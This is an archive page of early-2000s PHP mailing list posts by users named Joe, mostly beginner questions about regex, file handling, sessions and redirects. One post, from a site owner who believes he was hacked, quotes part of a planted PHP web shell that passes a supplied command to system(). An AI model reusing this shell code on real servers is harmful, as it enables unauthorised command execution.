[PHP] need help with preg_match

2003-02-08 Thread joe
Hi I have to alter this code: http://www.whatever.ee/', 'r'); for ($src = ''; !feof ($fp); $src .= fgets ($fp, 1024)); fclose ($fp); if (preg_match ('/\([^<]*)\<\/font>/i', $src, $matches)) echo'Match: '.$matches[1].''; else echo'No match !'; ?> It extracts the data (words) from

Re: [PHP] need help with preg_match

2003-02-08 Thread joe
Thank You very much! It Really works the way I want it to. But i still have a slight problem. The script cant read the data if it is on several rows. For example: text Is there a way to fix this problem? Thank You! "Chris Hayes" <[EMAIL PROTECTED]> wrote in message [EMAIL PROTECTED]">ne

[PHP] calculating kilobytes

2003-02-14 Thread joe
hi first of all i think this is a great community here :) now to the point... i need a script. it should work on safe mode php so it should be as simple as possible. it should calculate all the file sizes in the directory that it is in and in the subdirectories also (only 1 level subdirectories).

Re: [PHP] calculating kilobytes

2003-02-14 Thread joe
"Jason Wong" <[EMAIL PROTECTED]> wrote in message [EMAIL PROTECTED]">news:[EMAIL PROTECTED]... > On Saturday 15 February 2003 03:17, joe wrote: > > > now to the point... > > i need a script. it should work on safe mode php so it should be as simple > &

Re: [PHP] calculating kilobytes

2003-02-15 Thread joe
"Greg Donald" <[EMAIL PROTECTED]> wrote in message [EMAIL PROTECTED]">news:[EMAIL PROTECTED]... > On Fri, 14 Feb 2003, joe wrote: > > >i searched and i tried and i failed. most of the functions dont work in safe > >mode, some didnt do what i wanted (retur

[PHP] browser uploading

2003-03-02 Thread joe
i am operating on safe mode and i need to figure out, how to upload files with php through your browser. copy() is disabled for sure, im not absolutsely sure about other functions. i have heard that it is actually possible but so far i haven't been able to figure out how.. any ideas would be most h

[PHP] checking array

2003-03-15 Thread joe
what is the best way to check, if a value is NOT in an array? the purpose is to take results from a webpage and check one-by-one if they are in the txt file already. if they are not, i have to write them there.. If they are in there then i just want to leave them alone. this is what i came up with

[PHP] a stupid question

2003-07-24 Thread Joe
how to check the filetype of remote file because is_dir(), is_file() can't work on remote file thx a lot -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Please help!!! thx a lot~~~

2003-07-24 Thread Joe
I have written a php to show file in directories. The problem is due to is_dir() can't opearate on remote files. What should I do in order to fix it. thx a lot~~~ begin 666 list.php M/#]P:' -"B @)&9I;&5N86UE/2=L:7-T+G!H<"<[#0H@(&=L;V)A;" D8W5R MPT*(" @(" @(" @("1O=71P=71;,%U;,%T](CQ! M($A2148]7"(

[PHP] Re: Please help!!! thx a lot~~~

2003-07-24 Thread Joe
any alternative method is also welcome "Joe" <[EMAIL PROTECTED]> ¼¶¼g©ó¶l¥ó·s»D :[EMAIL PROTECTED] > I have written a php to show file in directories. > The problem is due to is_dir() can't opearate on remote files. What should I > do in order to fix it. > thx

[PHP] Please help!!!~~thx a lot

2003-07-24 Thread Joe
I have just started to learn php and written a php to list the files. But there is a problem, seen the is_dir() function can't work on remote files. Therefore, it couldn't check the filetype of subdirectories. Would anyone tell me what should I do. Thx a lot begin 666 list.php M/#]P:' -"B @)&9I;&

Re: [PHP] a stupid question

2003-07-24 Thread Joe
thx "Jacob Vennervald Madsen" <[EMAIL PROTECTED]> ¼¶¼g©ó¶l¥ó·s»D :[EMAIL PROTECTED] > Download it and then check it. But if you need to check a lot of files > that's probably to slow. > > Jacob Vennervald > > On Thu, 2003-07-24 at 06:03, Joe wrote: >

[PHP] Re: Please help!!! thx a lot~~~

2003-07-24 Thread Joe
I see the point but I just want to list the subfolder under my directory. Could you please tell me how to distinguish a directory from a file in Unix thx a lot "Sven" <[EMAIL PROTECTED]> ¼¶¼g©ó¶l¥ó·s»D :[EMAIL PROTECTED] > hi joe, > you want a server-script, that lists

Re: [PHP] Re: Please help!!! thx a lot~~~

2003-07-24 Thread Joe
HTTP my department disable the function of listing file "Marek Kilimajer" <[EMAIL PROTECTED]> ???:[EMAIL PROTECTED] What is remote in your circumstances? FTP, HTTP, ... ? Joe wrote: > any alternative method is also welcome > > "Joe" <[EMAIL PROTECTE

[PHP] nonblocking socket causes 100% cpu usage

2003-09-29 Thread Joe
lect() indicates that there is data waiting.) Thanks Joe -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] upload file size

2003-11-14 Thread joe
ully uploaded and then checked. i tested it several times - if the file is much larger than allowed, it displays the error message but the page loads a lot longer and my computer is sending the file to the server. this could really kill my bandwidth. is there a way to check the file size without full

[PHP] saving variables and including files.

2003-12-30 Thread Joe
t like 3 or 4 entries each. Since my webspace limits the number of databases, i'd rather do it without the use of that. My second question is about including pages. would | include the file the same way a SSI include would? Thanks. -Joe | -- PHP General Mailing List (http://www.php.net/) To

Re: [PHP] Limit image height/width on upload

2001-01-12 Thread joe
Specifically getimagesize() - You'll get an array with element 0 as the width and 1 as the height. Just test it after it's uploaded and either keep it or throw it out. Joe Jason Murray wrote: > > Is there a way to limit the image size with php? > > You would have to use s

[PHP] Associative vs normal arrays

2001-03-16 Thread Joe
Is there a way to determine if an array is associative or not? Maybe something similar to the is_array() function ?? Thanks, JOE

Re: [PHP] Associative vs normal arrays

2001-03-16 Thread Joe
Oops, how embarassing :-( My son must have been playing with it. Thanks! - Original Message - From: Chris Mulcahy <[EMAIL PROTECTED]> To: 'Joe' <[EMAIL PROTECTED]> Sent: Friday, March 16, 2001 3:51 PM Subject: RE: [PHP] Associative vs normal arrays > Joe:

[PHP] redirect browser

2002-04-19 Thread Joe
heck.php:4) in c:\html\html\check.php on line 42 I had no idea about this. Can anyone tell me what's wrong of my code? Thx! Joe -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] redirect browser

2002-04-20 Thread Joe
may be my message are hazy. the line = is not include in my php code/page, i just use it in this message as to divide into different section. Joe "Jason Wong" <[EMAIL PROTECTED]> ???:[EMAIL PROTECTED] > On Saturday 20 April 20

[PHP] [HELP] redirect browser & pass variable !

2002-04-21 Thread Joe
I am using header function to redirect browser. { header("Location: http://www.XXX.edu/index.php";); exit;} Although it can redirect the browser but variable had not pass to next page. So can anyone teach me how to pass variable and redirect browser at same time? Thx ! Joe

Re: [PHP] Re: [HELP] redirect browser & pass variable !

2002-04-22 Thread Joe
I can do it now. Thanks all of you ! Joe "Hugh Danaher" <[EMAIL PROTECTED]> ???:000b01c1e9c5$02ccf460$[EMAIL PROTECTED] > > { header("Location: > http://www.XXX.edu/index.php?variable=$variable&second_variable=$second_vari > able"); >

[PHP] hidden value

2002-04-03 Thread Joe
variable to next page. but i don't know why the variable display on the page, not hidden. I think my php code that pass hidden value had error but i don't know how to correct. Can anyone help me? thx! best regards, Joe -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] How to save the "result page" generated by a Form?

2001-12-20 Thread Joe
as .txt or .rft or .html How can I do that? I try many ways ...(using no session) ..but I can only save the empty b.php page ...with no varialbles showed at all. Thanx for your help and Marry XMas from Italy. BR Joe -BEGIN PGP SIGNATURE- Version: PGPfreeware 7.0.3 for non-commercial

[PHP] PHP print

2001-04-02 Thread Joe
torial out there then I would like to make my own. Thank you! Joe -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]

[PHP] dl("php_imap.so")?

2001-09-13 Thread joe
I would like to load the imap extension dynamically on a shared Linux server and I have libc-client4.a in my cgi-bin directory -- what is this file for? Where do I get the files to build the dynamically loadable version of the imap library? Thanks, Joe -- PHP General Mailing List (http

[PHP] operators as callbacks?

2008-11-29 Thread Joe
Is it possible to use a PHP operator as a callback? Suppose I want to add two arrays elementwise, I want to be able to do something like this: array_map('+', $array1, $array2) but this doesn't work as "+" is an operator and not a function. I can use the BC library's math functions instead: array

[PHP] Problems With Fopen

2001-02-02 Thread Joe
w/ome/faid/newsitems/news.txt","r") - No such process in d:/www/ome/faid/new.php on line 67 Thanks again --Joe http://www.koston.net -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTE

[PHP] Windows Time modification 12/31/1969???

2001-02-02 Thread Joe
I'm opening the files in a directory, and trying to find the most recent modification date. The problem is that I'm getting the date of 12/31/1969 for all my files, and when I try to print out the modification timestamp from filemtime directly I get nothing. If you look at the code you can se

[PHP] using mail() with .info emails?

2002-12-29 Thread Joe Popovich
Im trying to send email using mail() to a .info email address and get an error message. I assume the function parses the email address and doesnt accept anything that isnt the customary .net, .com, etc. addresses. How can I get around this? Thanks joe Popovich

Re: [PHP] hyperlink

2003-01-01 Thread Joe LoMoglio
On Wednesday, January 1, 2003, at 02:06 PM, Ezequiel Sapoznik wrote: print($row["banner_nombre"] ."\n"); Try this: print ""; print ($row["banner_nombre"] ."\n"); print ""; Joe -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] hyperlink

2003-01-01 Thread Joe LoMoglio
age. The above code should do the trick. Joe On Wednesday, January 1, 2003, at 03:10 PM, Ezequiel Sapoznik wrote: Thanks for your help! I try, but if you check at http://www.historiadelpais.com.ar/test.php, you can see that I still have the link but what I need is that the php shows the

Re: [PHP] 2 servers for mail implementation

2003-01-03 Thread Joe Mck
Hi, > At 07:11 PM 1/2/03 -0800, Roger Thomas wrote: > >dear all, > >i have 2 servers that were *given* to me to setup and implement webmail > >solution for our client. i have done some groundwork in terms of the backend > >applications that are needed to do this. > > > This doesn't have

[PHP] Excel to MySQL

2003-01-03 Thread Joe LoMoglio
the other solutions. Joe LoMoglio -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Excel to MySQL

2003-01-03 Thread Joe LoMoglio
Thanks Michael and Richard I took your advice and wrote a PHP script to import it. I was having a hard time getting Excel on my Mac to export to CSV and Tab Delim, but finally got it to give me a plain text file which worked fine with fopen(). Joe On Friday, January 3, 2003, at 02:32 PM

[PHP] Directory Listing with php on unix boxes

2003-01-06 Thread Joe Jeffcoat
t; and $filenames[$i] !="..") { echo "" . "$filenames[$i]" . "\n"; } } Even if I take out the sorting, the file listing order does not change. Any ideas about what may be causing this? Thanks! Joe -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Directory Listing with php on unix boxes

2003-01-06 Thread Joe Jeffcoat
t; and $filenames[$i] !="..") { echo "" . "$filenames[$i]" . "\n"; } } Even if I take out the sorting, the file listing order does not change. Any ideas about what may be causing this? Thanks! Joe -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Directory Listing with php on unix boxes

2003-01-06 Thread Joe Jeffcoat
t; and $filenames[$i] !="..") { echo "" . "$filenames[$i]" . "\n"; } } Even if I take out the sorting, the file listing order does not change. Any ideas about what may be causing this? Thanks! Joe - Do you Yahoo!? Yahoo! Mail Plus - Powerful. Affordable. Sign up now

[PHP] MySQL 4.0 + PHP 4

2003-01-22 Thread Joe Stump
Anyone out there have anything to share as to using PHP4+MySQL4. I've been hearing good things on the MySQL list about v4.0 and I'm thinking of upgrading, since I run a rather small server. Thanks! --Joe ps. PHP list responders please respond directly. I'm not currently subs

[PHP] Writing text files in Windows 2k

2003-02-10 Thread Joe Njeru
ASCII LF and CR. Which I did. It still does not display the new line. Thanks in advance Joe Njeru -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Writing text files in Windows 2k

2003-02-10 Thread Joe Njeru
Thanks for the tip I want to export a report to excell and a legacy system that allow csv file import for incorporation into the financial system. Joe Njeru Nairobi, Kenya. "Where else can you flyfish for trout on the Equator!" -- PHP General Mailing List (http://www.php.net/) To u

[PHP] about writing extension

2003-02-10 Thread Joe Wong
? Also, would it be possible to expose my C++ class in my shared library to PHP? TIA. Joe -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Writing text files in Windows 2k

2003-02-10 Thread Joe Njeru
Hi All The following is the text file generated. I'm runing on Windows 2k spack 3, When I open it in Excell it gives me the data but not seperated into lines. Do you have any suggestions. Joe Njeru, Nairobi, Kenya. begin 666 veh_fuel_iss_hist_rpt.csv M,C P,BTQ,2TP,CM!,C R,3DV.U!%5%)/3&qu

[PHP] Code

2003-02-10 Thread Joe Njeru
Hi, This is the code that creates the file function writeln_to_file($str_txt) /* Definition: This function writes/appends $str_txt to the file Parameters: $str_txt; String; The String to be written to file ReturnType: NONE; */ {

[PHP] PHP 4.3 on win 2k

2003-02-12 Thread Joe Njeru
roblems. Could someone help me out. Joe Njeru -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] IIS

2003-02-12 Thread Joe Njeru
Hi, I'm using IIS on win2k. Joe Njeru -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Database Persistance Layer

2003-02-20 Thread Joe Njeru
reduction will be felt by the end users. Do you know of any ways one can improve on a database persistance layer or should I try to incorporate bothe approaches? Thanks in advance, Joe Njeru Nairobi, Kenya " Vote for the Kenyan Safari Rally on www.wrc.com The toughest rally in the world! "

[PHP] problem using extension.

2003-03-03 Thread Joe Wong
Hello, I have some problem using an extension written by myself. Here are the details: OS. RedHat 7.2 Apache: 1.3.20-16 (out of the box version ) PHP 4.3.0 compiled with: -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] ZEND_SET_SYMBOL compilation error

2003-03-12 Thread Joe Wong
Hi, I am writing a PHP extension on Win32. I put a ZEND_SET_SYMBOL in the php_init_xxx_globals() and it failed to compile under Win32 using VC++ 5.0, the error I got: Y:\php-4.3.0\ext\wmcphp\wmcphp.c(138) : error C2065: 'tsrm_ls' : undeclared identifier Which corresponds to: ZEND_SET_SYMBOL(EG(a

[PHP] two questions about usning session.

2003-03-12 Thread Joe Wong
back to the Windows of User A and continue to do something, the PHP session gives me the name of User B and User'B session ID. Why? Am I doing something wrong here? Thanks, - JOE -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] two questions about usning session.

2003-03-12 Thread Joe Wong
nocache and after I change it to empty string, it solved my problem. For the second problem, I tried your script with two instances of IE 6.1 running, I didn't get two distinct values. Any idea? - Joe - Original Message - From: "Justin French" <[EMAIL PROTECTED]> T

Re: [PHP] can't get any string replacements to clean this

2003-03-13 Thread Joe Goff
Put the arguments inside of double quotes instead of single quotes and then try it. $bad_str = str_replace("\r","\n",$bad_str); - Original Message - From: "Dennis Gearon" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Thursday, March 13, 2003 11:51 PM Subject: [PHP] can't get any string

Re: [PHP] OT Inactivity Timeout

2003-03-14 Thread Joe Goff
use sessions - Original Message - From: "Luis Lebron" <[EMAIL PROTECTED]> To: "Php-General (E-mail)" <[EMAIL PROTECTED]> Sent: Friday, March 14, 2003 10:03 AM Subject: [PHP] OT Inactivity Timeout > This may be more of a javascript question than a php question. But how can I > set up an in

[PHP] connect to MAS 90 & 200 with PHP

2003-07-07 Thread Joe Harman
I am curious if anyone is using PHP to connect to a MAS 90 or 200 database?? I am interested in any info on this if anyone has any... THX, Joe

RE: [PHP] New to PHP

2003-07-07 Thread Joe Harman
hers are the ones I still use the most... Good luck Joe -Original Message- From: Hiren Mehta [mailto:[EMAIL PROTECTED] Sent: Monday, July 07, 2003 5:28 PM To: PHP Subject: [PHP] New to PHP Hi I am new to PHP and would like to learn more about it. Which would be the best place to start

RE: [PHP] XML

2003-07-08 Thread Joe Harman
Okay Petre... You have asked the question that I always wanted to ask!!! I can't wait to see peoples answer... I simply can't find a use for it either Joe -Original Message- From: Petre Agenbag [mailto:[EMAIL PROTECTED] Sent: Tuesday, July 08, 2003 6:27 AM To: [EMAIL

RE: [PHP] date frustrations

2003-07-08 Thread Joe Harman
There is probably a better way than this... But I always use EPOCH when I need to put something in order... You can then just write a function to interperate the date when it need to be readable Hope that makes sense joe -Original Message- From: Shena Delian O'Brien [mailto:[

RE: [PHP] Re: Defending -> [PHP] New Krysalis version released

2003-07-08 Thread Joe Harman
valuable to this community... Especially the newbees here On the other side... I can understand why you are against the spam... You probalby will be surprised if you take a look at the quality of their products... joe -Original Message- From: Alexandru COSTIN [mailto:[EMAIL

RE: [PHP] Alex,Joe - >Re: [PHP] New Krysalis version released

2003-07-08 Thread Joe Harman
Yeah Ryan... I actually agree with the passive spamming issue... Actually spamming in general... And don't take any offense to my comments... LOL... Cause they totally weren't ment that way... Have a great one! Respectfully, Joe -Original Message- From: Ryan A [mailto:[EMAIL

[PHP] Annoucement Idea

2003-07-08 Thread Joe Harman
want to read it, you can delete it... or set up a rule in Outlook to delete it??? so... just an idea see ya, joe

[PHP] To All Those Seeking XML & PHP Wisdom!

2003-07-09 Thread Joe Harman
Found a brand new tutorial... just came out today... http://www.sitepoint.com/article/1165 Joe Harman Have you ever noticed? Anybody going slower than you is an idiot, and anyone going faster than you is a maniac. - George Carlen

RE: [PHP] Can php/mysql handle 10000s of records

2003-07-09 Thread Joe Harman
this board can point you in the right direction... Have a great day Joe Harman http://www.HarmanMedia.com Everything is funny as long as it is happening to somebody else. - Will Rogers -Original Message- From: Adam Gerson [mailto:[EMAIL PROTECTED] Sent: Wednesday, July 09, 2003 9:5

RE: [PHP] $_POST problem

2003-07-09 Thread Joe Harman
Hey... Just for Sh** and giggles... Try removing the quotes from keywords Make it look like this... $img_keywords = trim({$_POST[keywords]}) Hmmm. Something is up here... Never seen curly brackets used like this... But that would probably be normal for me LOLjust thought I point out

RE: [PHP] $_POST problem

2003-07-09 Thread Joe Harman
Montoy [mailto:[EMAIL PROTECTED] Sent: Wednesday, July 09, 2003 11:21 PM To: [EMAIL PROTECTED] Subject: Re: [PHP] $_POST problem Didn't make a difference. Still getting the errors. "Joe Harman" <[EMAIL PROTECTED]> wrote in message news:[EMAIL PROTECTED] > Hey... Just f

RE: [PHP] $_POST problem

2003-07-09 Thread Joe Harman
LOL... I was running out of silly tricks to pull out of my hat LOL... Hey no problem Micah... I do this about 3 or 4 times a day Especially when my right brain takes over and the ADD sets in... Have a great one! Joe -Original Message- From: Micah Montoy [mailto:[EMAIL PROTECTED

[PHP] (REAL TUFFY ) Lat/Long Map Image Manipulation

2003-07-09 Thread Joe Harman
ction Joe Harman http://www.HarmanMedia.com Health nuts are going to feel stupid someday, lying in hospitals dying of nothing. - Redd Foxx

RE: [PHP] (REAL TUFFY ) Lat/Long Map Image Manipulation

2003-07-10 Thread Joe Harman
Hey thanks... They are pretty much trying to do what I am working... I will try to interact a little with them... Have a great one! Joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Thursday, July 10, 2003 10:35 AM To: Joe Harman Cc: [EMAIL PROTECTED

[PHP] dump $_POST into variables????

2003-07-10 Thread Joe Harman
list my variables ie $ZipCode, $Distance, $Blah - have them dump in to each!!! thanks Joe Harman http://www.HarmanMedia.com You will never be happy if you continue to search for what happiness consists of. You will never live if you are looking for the meaning of life. - Albert Camus

RE: [PHP] dump $_POST into variables????

2003-07-10 Thread Joe Harman
Ah... Jason Man Of Few Words! THANKs... You have saved me time and lines in my code :-) Cheers! Joe -Original Message- From: Jason Wong [mailto:[EMAIL PROTECTED] Sent: Friday, July 11, 2003 1:13 AM To: [EMAIL PROTECTED] Subject: Re: [PHP] dump $_POST into variables On Friday

[PHP] Need Some Basic Help with Arrays

2003-07-11 Thread Joe Harman
od ways to explain it to a right brainer like myself Joe Harman http://www.HarmanMedia.com You will never be happy if you continue to search for what happiness consists of. You will never live if you are looking for the meaning of life. - Albert Camus

[PHP] Session Problems with 4.3.2

2003-07-22 Thread Joe Sheehan
I've been using up until a day or so ago version 4.0.6. I'm moving everything now to 4.3.2 but having problems with sessions. I've tried a basic example but can't retrieve session values. Can anyone tell me what I'm doing wrong? I see the session file is created but can't retrieve its value. What i

[PHP] Session Problems with 4.3.2

2003-07-22 Thread Joe Sheehan
Just noticed my email was messed up because of the html. Sorry about that I've been using up until a day or so ago version 4.0.6. I'm moving everything now to 4.3.2 but having problems with sessions. I've tried a basic example but can't retrieve session values. Can anyone tell me what I'm doing wro

Re: [PHP] Session Problems with 4.3.2

2003-07-22 Thread Joe Sheehan
No, basically I'm just trying to make sure sessions are working properly. I'm just setting a session variable (which works fine) and trying to retrieve it within another script which doesn't work. No value is printed out. thanks From: Evan Nemerson <[EMAIL PROTECTED]> To:

Re: [PHP] Session Problems with 4.3.2

2003-07-22 Thread Joe Sheehan
It echo No. Have no idea why its not set? Even tried using session_register with register_globals on but no luck either. Anyone have any idea what i'm doing wrong? I'm hoping its just a user error. Thanks in advance From: Evan Nemerson <[EMAIL PROTECTED]> To: "Joe Sheehan&qu

Re: [PHP] Session Problems with 4.3.2

2003-07-22 Thread Joe Sheehan
hich daemon in 4.3 is the correct one which is the standalone similar to 4.2 and 4.0.6. I hope its just a user error at this point. Thanks From: Evan Nemerson <[EMAIL PROTECTED]> To: "Joe Sheehan" <[EMAIL PROTECTED]>, [EMAIL PROTECTED] Subject: Re: [PHP] Session Problems with

[PHP] help with explode.....

2003-07-24 Thread Joe Harman
e use the 'explode()' function no this... and assign them to variables... I need to draw out the radio button id and what they answered... hope that makes sense... thanks for all your help in advance Joe Harman http://www.HarmanMedia.com Only two things are infinite, the universe and

[PHP] RE: help with explode.....

2003-07-24 Thread Joe Harman
The name of the set of radio buttons is the QuestionID (so it's a number)... And the options are the AnswerID (they are also numbers)... -Original Message- From: Shaunak Kashyap [mailto:[EMAIL PROTECTED] Sent: Friday, July 25, 2003 1:03 AM To: Joe Harman Subject: Re: help with ex

[PHP] RE: help with explode.....

2003-07-24 Thread Joe Harman
ument The Cool Joe Survey What color are you eyes? Blue Green What Letter does your name start with a b c What Day is it Thurs Fri Tues Can I do something like this on the nest

RE: [PHP] help with explode.....

2003-07-24 Thread Joe Harman
SO COOL... Thanks too all -Original Message- From: Binay Agarwal [mailto:[EMAIL PROTECTED] Sent: Thursday, July 24, 2003 1:48 PM To: Joe Harman Cc: [EMAIL PROTECTED] Subject: Re: [PHP] help with explode. > Okay... this probably isn't that hard to do... but I am just

[PHP] How Do I Change A Number to Percentage

2003-07-25 Thread Joe Harman
Hey, hope all are doing fine. can someone help me be showing me how to change the following numbers to represent percentages 0.92857142857143 0.071428571428571 1.0 Thanks Joe Harman http://www.HarmanMedia.com So we went to Atari and said, `Hey, we've got this amazing thing, even

[PHP] Strip Numbers

2003-07-29 Thread Joe Harman
Hey could someone help me out here I need to strip numbers from a passed variable ex. 3899007 all the numbers will have 990 (so that is the 4th, 5th & sixth numbers... from the right...) I want to keep everything to the left of the two 9s... is there an easy way to do that????

[PHP] THX Strip Numbers

2003-07-30 Thread Joe Harman
Hey Thanks you guys... I appreciate your help! Cheers Joe Harman http://www.HarmanMedia.com This `telephone' has too many shortcomings to be seriously considered as a means of communication. The device is inherently of no value to us. - Western Union internal memo, 1876

[PHP] Possible My Website was hacked... with PHP... please tell me what this is???

2003-07-30 Thread Joe Harman
trapping? Abaixo, terminal onde aparecerá os resultados dos comandos que você executou /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt"); } else { system($command); } } ?> Crime Perfect 2003 By _m4st3r_c0d3 - #crimeperfect Joe Harman http://www.HarmanMedia.com Only two things are infinite, the universe and human stupidity, and I'm not sure about the former. - Albert Einstein

RE: [PHP] Possible My Website was hacked... with PHP... please tell me what this is???

2003-07-30 Thread Joe Harman
Fortunatly I don't think they were doing something correctly, cause it didn't deface my site like some of the others Thanks all Joe -Original Message- From: Adrian [mailto:[EMAIL PROTECTED] Sent: Thursday, July 31, 2003 2:14 AM To: [EMAIL PROTECTED] Subject: Re: [PHP] P

RE: [PHP] Possible My Website was hacked... with PHP... please tell me what this is???

2003-07-31 Thread Joe Harman
ified my webhost... I guess it wasn't the first time they've seen this... So the are taking action on it and probably canceling my account... LOL... Thanks for all your help! Joe -Original Message- From: Joel Rees [mailto:[EMAIL PROTECTED] Sent: Thursday, July 31, 2003 3:10 AM

RE: [PHP] Article: PHP vs ASP

2003-07-31 Thread Joe Harman
Oh, do you mean like Chilisoft for PHP on a IIS server... LOL.. That would be funny -Original Message- From: John Manko [mailto:[EMAIL PROTECTED] Sent: Thursday, July 31, 2003 10:13 AM To: Jay Blanchard Cc: Ralph Guzman; PHP General Mailing List Subject: Re: [PHP] Article: PHP vs ASP I'

RE: [PHP] Article: PHP vs ASP

2003-07-31 Thread Joe Harman
Yes I agree it would be funny... In my opinion there is no need for the ASP platform... But then again, who am I for having an educated opinion, I let a hacker put a shell script on my site NOW THAT'S FUNNY! -Original Message- From: John Manko [mailto:[EMAIL PROTECTED] Sent: Thursday,

RE: [PHP] Tracking Users via Cookies? IDEA

2003-08-04 Thread Joe Harman
What if you could read a browser's history file... There has to be a way to do this with something like javascript... Just an idea... Joe -Original Message- From: Ryan A [mailto:[EMAIL PROTECTED] Sent: Sunday, August 03, 2003 9:03 PM To: Jason Bourque Cc: [EMAIL PROTECTED] Subjec

[PHP] PHP & P2P File sharing

2003-08-06 Thread Joe Harman
Hello, I curious if anyone knows of a PHP based Peer-to-Peer file sharing program out there! I have a friend that wants to implement this with his web server.. Joe Harman

RE: [PHP] PHP & P2P File sharing

2003-08-06 Thread Joe Harman
make a file locker type app for them Joe > -Original Message- > From: Chris Shiflett [mailto:[EMAIL PROTECTED] > Sent: Wednesday, August 06, 2003 11:28 PM > To: Joe Harman; [EMAIL PROTECTED] > Subject: Re: [PHP] PHP & P2P File sharing > > > --- Joe Harman <

RE: [PHP] Still can't pass variable through url

2003-08-08 Thread Joe Harman
Jack... Can you paste your code into an email and post it > -Original Message- > From: Jack [mailto:[EMAIL PROTECTED] > Sent: Friday, August 08, 2003 2:30 AM > To: [EMAIL PROTECTED]; [EMAIL PROTECTED] > Subject: [PHP] Still can't pass variable through url > > > Dear all > I had set the

RE: [PHP] Re: suggestion on php-editor?

2003-08-08 Thread Joe Pemberton
www.crimsoneditor.com A great, free editor for windows with syntax highlighting for many languages, php included. -Original Message- From: rush [mailto:[EMAIL PROTECTED] Sent: Friday, August 08, 2003 12:58 AM To: [EMAIL PROTECTED] Subject: [PHP] Re: suggestion on php-editor? "Louie Mira

RE: [PHP] Still can't pass variable through url.. whoops

2003-08-08 Thread Joe Harman
YEPPERS.. You're right > -Original Message- > From: Martin Towell [mailto:[EMAIL PROTECTED] > Sent: Friday, August 08, 2003 2:59 AM > To: 'Joe Harman'; [EMAIL PROTECTED] > Subject: RE: [PHP] Still can't pass variable through url > >

RE: [PHP] Re: [ERR] DEAD MAILBOX

2003-08-11 Thread Joe Harman
CHRISTMAS IN AUGUST! > -Original Message- > From: andu [mailto:[EMAIL PROTECTED] > Sent: Friday, August 08, 2003 2:53 AM > To: [EMAIL PROTECTED] > Subject: Re: [PHP] Re: [ERR] DEAD MAILBOX > > > On Fri, 08 Aug 2003 02:52:31 -0400 > John Manko <[EMAIL PROTECTED]> wrote: > > > arrg.

[PHP] Flash Actionscript List or Forum

2003-08-12 Thread Joe Harman
Hello all, I've been doing PHP for a little while now... I am starting learn Action Script now... and having trouble with global variables and functions... does anyone know where I find a good list or forum for action script? Joe Harman http://www.HarmanMedia.com I used to think

RE: [PHP] Still can't pass variable through url

2003-08-12 Thread Joe Harman
http://www.thingamajigger.com/index.php?year=$year&month=$month\"; >yeah this is the link"; ?> > -Original Message- > From: John Manko [mailto:[EMAIL PROTECTED] > Sent: Friday, August 08, 2003 2:47 AM > To: Martin Towell > Cc: 'Jack'; [EMAIL PROTECTED]; [EMAIL PROTECTED] > Subject: Re:

[PHP] Installer Software

2003-08-14 Thread Joe Harman
n the desktop... can anyone recommend anything out there.. preferably that is free Respectfully, Joe Harman

[PHP] postmaster@hanmir.com

2003-08-14 Thread Joe Harman
Hey is every one getting a returned message from [EMAIL PROTECTED] Joe Harman

  1   2   3   4   5   6   7   8   >